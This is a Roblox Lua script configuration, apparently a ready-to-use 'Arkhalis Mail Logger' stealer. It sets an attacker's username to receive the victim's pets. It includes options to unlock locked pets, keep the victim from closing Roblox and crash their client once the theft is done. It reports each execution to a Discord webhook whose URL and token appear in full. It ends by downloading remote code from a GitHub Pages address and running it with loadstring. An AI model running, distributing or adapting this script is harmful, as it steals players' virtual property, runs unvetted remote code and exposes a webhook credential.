--[[ Arkhalis Mail Logger ]]--
 
--[[ Main Config ]]--
_G.Username = "61x511" --// Username To Send Pets To
_G.GiftMessage = "yoyo" --// Message For The Gift To Say
 
_G.Diamonds = 5000000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true  --// Crashes Them After Its Finished
 
--[[ Webhook Config ]]--
_G.Enabled = true --// Toggle For Sending Webhooks
_G.Mention = true --// Pings You When Someone Executes
_G.Webhook = "https://discord.com/api/webhooks/1098612203889893440/wYU3vEUOFKmIgW6oYB-WlPbNAQDhxNW6MPJ4lbNmHaPoCgZOpnpaIb4GOLWx7DXImtgc" --// Discord Webhook For Executions
 
--[[ UI Config ]]--
_G.ScriptName = "bankstealer" --// Script Name On The UI
_G.Tip1 = "how are u" --// Gives You Tips On The UI
_G.Tip2 = "" --// Gives You Tips On The UI
_G.Tip3 = "" --// Gives You Tips On The UI
_G.Tip4 = "" --// Gives You Tips On The UI
_G.Tip5 = "" --// Gives You Tips On The UI
 
--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
